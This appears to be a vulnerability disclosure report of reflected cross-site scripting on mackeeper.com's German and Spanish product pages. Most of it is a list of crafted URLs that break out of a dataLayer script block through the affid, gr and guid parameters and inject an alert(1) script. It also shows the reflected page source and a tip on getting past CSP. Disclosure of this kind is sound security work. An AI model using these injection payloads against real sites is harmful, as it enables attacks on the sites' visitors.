Multiple Links Vulnerable to Reflected xss

### Summary Multiple Links Vulnerable to Reflected xss in `https://mackeeper.com/mk/de/` ### Steps to reproduce goto these links and xss will be triggered ``` https://mackeeper.com/mk/de/adware-removal/?affid=596d6f80-eb86-11e9-84e4-a2e51eb97200-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=59ead2d9-eb86-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/anti-malware-lab/?affid=1ab6d400-ebdd-11e9-a756-f5850ae9fc00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=1b146bfe-ebdd-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/duplicates-finder/?affid=d4458300-eba4-11e9-92e9-aa39ddcd0c00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=d4d98772-eba4-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/eula-mk3/?affid=c4d36280-d8a2-11e9-afb9-22d3643f1600-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=c537a9a0-d8a2-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/internet-security/?affid=8fd9d780-ebe4-11e9-96e4-3e714f5bd500-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=903b0f74-ebe4-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/mac-antivirus/?affid=30e57580-eb86-11e9-91a9-c99b14b02b00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=316b9437-eb86-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/mac-uninstaller/?affid=47022e80-eba4-11e9-a836-8844e67acf00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=474685d3-eba4-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/partners?affid=c4d8fa00-d47f-11e9-bb31-4ca249ec8a00-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=053b5eb3-d78a-11e9-959a-0242ac110002xxxxxxxx",});</script>%0a<script>alert(1)</script>>><>>&utm_medium=buynow/xxxxxxxx'"><> https://mackeeper.com/mk/de/refund/?affid=6c03ca00-d8a2-11e9-9fe9-faafdda89700-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=6c21ebb7-d8a2-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/remote_support/?affid=42956f00-d89f-11e9-a3e5-e8859fb1d300-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=42fbf9aa-d89f-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/remove-ads/?affid=7db89200-d8e1-11e9-9714-51ff6fb49400-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=7e0d842b-d8e1-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/track-my-mac/?affid=5a060600-eb86-11e9-9191-bb7558fcf700-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=5a7f3ae2-eb86-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/de/uninstall_mackeeper/?affid=26ece880-dc52-11e9-b6ef-24b4d9113900-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=274ef1ca-dc52-11e9-8128-0242ac110004/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> https://mackeeper.com/mk/es/adware-removal/?affid=596d6f80-eb86-11e9-84e4-a2e51eb97200-mzbxxxxxxxx'"><>&gr=1xxxxxxxx'"><>&guid=59ead2d9-eb86-11e9-959a-0242ac110002/xxxxxxxx",});</script>%0a<script>alert(1)</script>>><> ``` if xss not triggered try burpsuite to view source code sometime csp blocks alert, or you can use IE 11 ``` <script> var dataLayer = dataLayer || window.dataLayer || []; dataLayer.push({ "pageType": "AllPages", "userId": "7e0d842b-d8e1-11e9-8128-0242ac110004/xxxxxxxx",});</script> <script>alert(1)</script>>><>", "touchPoint": "web", "country": "PK", "affid": "145.14736301.1408462723.2.mzb" }); </script> ```